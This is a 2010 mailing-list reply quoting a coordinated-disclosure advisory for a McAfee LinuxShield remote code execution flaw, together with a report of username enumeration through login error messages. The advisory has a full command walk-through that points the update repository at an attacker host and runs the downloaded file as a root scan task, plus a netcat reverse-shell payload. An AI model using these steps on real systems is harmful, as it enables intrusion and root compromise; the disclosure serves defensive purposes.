ACK! You can find user which can login to the web interface with this trick.
Am 03.03.2010 09:14, schrieb Veal, Richard: > > I believe there could also be a remote user enumeration using this > service - when attempting to log into the web interface using a > non-valid username / any password you get "Error: bad credentials" but > when attempting to log with a valid username / invalid password you seem > to get: > > "Error: bad credentials > Error Information > Error Code Description > 34 authentication failure" > > Version 1.5.1, anyone confirm? Has this been mentioned before? > > > Rich > > > > -----Original Message----- > From: NSO Research [mailto:[email protected]] > Sent: 02 March 2010 21:30 > To: [email protected] > Subject: NSOADV-2010-004: McAfee LinuxShield remote/local code execution > > ______________________________________________________________________ > > NSOADV-2010-004: McAfee LinuxShield remote/local code execution > ______________________________________________________________________ > ______________________________________________________________________ > > 111101111 > 11111 00110 00110001111 > 111111 01 01 1 11111011111111 > 11111 0 11 01 0 11 1 1 111011001 > 11111111101 1 11 0110111 1 1111101111 > 1001 0 1 10 11 0 10 11 1111111 1 111 111001 > 111111111 0 10 1111 0 11 11 111111111 1 1101 10 > 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 > 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 > 0111111110 0110 1110 1 0 11101111111111111011 11100 00 > 01111 0 10 1110 1 011111 1 111111111111111111111101 01 > 01110 0 10 111110 110 0 11101111111111111111101111101 > 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 > 111110110 10 0111110 1 0 0 1111111111111111111111111 110 > 111 11111 1 1 111 1 10011 101111111111011111111 0 1100 > 111 10 110 101011110010 11111111111111111111111 11 0011100 > 11 10 001100 0001 111111111111111111 10 11 11110 > 11110 00100 00001 10 1 1111 101010001 11111111 > 11101 0 1011 10000 00100 11100 00001101 0 > 0110 111011011 0110 10001 101 11110 > 1011 1 10 101 000001 01 00 > 1010 1 11001 1 1 101 10 > 110101011 0 101 11110 > 110000011 > 111 > ______________________________________________________________________ > ______________________________________________________________________ > > Title: McAfee LinuxShield remote/local code > execution > Severity: Medium > Advisory ID: NSOADV-2010-004 > Found Date: 07.12.2009 > Date Reported: 05.02.2010 > Release Date: 02.03.2010 > Author: Nikolas Sotiriu (lofi) > Website: http://sotiriu.de > Twitter: http://twitter.com/nsoresearch > Mail: nso-research at sotiriu.de > URL: http://sotiriu.de/adv/NSOADV-2010-004.txt > Vendor: McAfee (http://www.mcafee.com/) > Affected Products: McAfee LinuxShield <= 1.5.1 > Not Affected Products: McAfee LinuxShield 1.5.1 with HF550192 > Remote Exploitable: Yes (attacker must be authenticated) > Local Exploitable: Yes > Patch Status: Vendor released a patch (See Solution) > Discovered by: Nikolas Sotiriu > Thanks to: Thierry Zoller: For the permission to use his > Policy > > > Background: > =========== > > LinuxShield detects and removes viruses and other potentially unwanted > software on Linux-based systems. LinuxShield uses the powerful McAfee > scanning engine - the engine common to all our anti-virus products. > > Although a few years ago, the Linux operating system was considered a > secure environment, it is now seeing more occurrences of software > specifically written to attack or exploit security weaknesses in > Linux-based systems. Increasingly, Linux-based systems interact with > Windows-based computers. Although viruses written to attack Windows- > based systems do not directly attack Linux systems, a Linux server can > harbor these viruses, ready to infect any client that connects to it. > > When installed on your Linux systems, LinuxShield provides protection > against viruses, Trojan horses, and other types of potentially unwanted > software. > > LinuxShield scans files as they are opened and closed - a technique > known as on-access scanning. LinuxShield also incorporates an on-demand > scanner that enables you to scan any directory or file in your host at > any time. > > When kept up-to-date with the latest virus-definition (DAT) files, > LinuxShield is an important part of your network security. We recommend > that you set up an anti-virus security policy for your network, > incorporating as many protective measures as possible. > > LinuxShield uses a web-browser interface, and a large number of > LinuxShield installations can be centrally controlled by ePolicy > Orchestrator. > > (Product description from LinuxShield Product Guide) > > > > Description: > ============ > > This vulnerability allows remote attackers to execute arbitrary code on > vulnerable installations of McAfee LinuxShield. User interaction is not > required to exploit this vulnerability but an attacker must be > authenticated. > > The LinuxShield Webinterface communicates with the localy installed > "nailsd" daemon, which listens on port 65443/tcp, to do configuration > changes, query the configuration and execute tasks. > > Each user, which can login to the victim box, can also authenticate it > self to the "nailsd" and can do configuration changes and execute tasks > with root privileges. > > A direct execution of commands is not possible, but it is possible to > download and execute code through manipulation of the config and execute > schedule tasks of the LinuxShield. > > > walk-through (after the TLS handshake): > +-------------------------------------- > > nailsd > +OK welcome to the NAILS Statistics Service > attacker> auth <user> <pass> > nailsd > +OK successful authentication > > # Set the Attacker repository to download our code from a httpd # > (catalog.z) > #--------------------------------------------------------------- > attacker> db set 1 _table=repository status=1 siteList=<?xml\ version > ="1.0"\ encoding="UTF-8"?><ns:SiteLists\ xmlns:ns="naSiteLi > st"\ GlobalVersion="20030131003110"\ LocalVersion="20091209 > 161903"\ Type="Client"><SiteList\ Default="1"\ Name="SomeGU > ID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1 > "\ Server="<attackerhost>:80"\ Enabled="1"\ Local="1"><Rela > tivePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></ > UserName><Password\ Encrypted="0"/></HttpSite></SiteList></ > ns:SiteLists> _cmd=update > nailsd > +OK database changes buffered. > > # Execute task to set the attacker repository > #--------------------------------------------------------------- > attacker> task setsitelist > nailsd > +OK setting sitelist from CMA. > > # Execute the default Update task to download the code > #--------------------------------------------------------------- > attacker> task nstart LinuxShield Update > nailsd > +OK task LinuxShield Update starting > > # Create a Scan profile, which executes our code. The profiles are # not > stored in the database. > # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg > #--------------------------------------------------------------- > attacker> sconf ODS_99 begin > nailsd > +OK 1260400888 > > # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path # > where our earlier downloaded catalog.z file is stored. > # (/opt/McAfee/cma/scratch/update/catalog.z) > #--------------------------------------------------------------- > attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles= > true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O > DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild= > 10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng > ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro > file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD > ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en > ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd > .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu > risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru > e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99 > .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi > le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil > dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin > e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr > ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm > o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile > .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t > rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat > ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100 > 00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile. > ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil > ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true > nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr > ofile.ODS_99.filter.extensions.type=extension nailsd.profil > e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99 > .action.Default.secondary=Quarantine nailsd.profile.ODS_99. > action.App.primary=Clean nailsd.profile.ODS_99.action.App.s > econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa > ss nailsd.profile.ODS_99.action.error=Block > nailsd > +OK configuration changes buffered > attacker> sconf ODS_99 commit 1260400888 > nailsd > +OK configuration changes stored > > # Set a scan task with the manipulated profile to execute the code > #--------------------------------------------------------------- > attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy > pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t > mp;exclude:false timetable=type=unscheduled taskResults=0 i > _lastRun=1260318482 status=Stopped _cmd=insert nailsd > +OK > database changes buffered > > # Execute scan task to execute the code > #--------------------------------------------------------------- > attacker> task nstart Evil Task > > +-------------------------------------- walk-through EOF > > > To get a reverse root shell place something like this in the catalog.z > > --- snip --- > #!/bin/sh > nc -nv <attacker_host> 4444 -e /bin/sh > --- /snip --- > > > > Proof of Concept : > ================== > > http://sotiriu.de/software/NSOPOC-2010-004.tar.gz > > > > Solution: > ========= > > McAfee Advisory > +-------------- > https://kc.mcafee.com/corporate/index?page=content&id=SB10007 > > > > Disclosure Timeline (YYYY/MM/DD): > ================================= > > 2009.12.07: Vulnerability found > 2010.02.03: Asked vendor for a PGP key > 2010.02.05: Vendor sent his PGP key > 2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure > date (2010.02.18) to Vendor > 2010.02.05: Vendor acknowledges the reception of the advisory > 2010.02.16: Ask for a status update, because the planned release date is > 2010.02.18. > 2010.02.16: Vendor response that, they are currently working on a patch > 2010.02.17: Changed release date to 2010.02.25. > 2010.02.22: Vendor gives a status update, that they are able to release > the patch on 2010.02.25. > 2010.02.24: Ask for a list of affected products and the advisory url. > 2010.02.24: Vendor sends the list. > 2010.03.02: Release of this Advisory > > > > > > > > ______________________________________________________________________ > This email has been scanned by the MessageLabs Email Security System. > For more information please visit http://www.messagelabs.com/email > ______________________________________________________________________ > > Western Power Distribution (South West) plc / Western Power Distribution > (South Wales) plc > Registered in England and Wales > Registered number: 2366894 (South West) / 2366985 (South Wales) > Registered Office: Avonbank, Feeder Road, Bristol, BS2 0TB > > This email and any files transmitted with it are confidential and intended > solely for the use of the individual or entity to whom they are addressed. If > you have received this email in error please notify > [email protected]
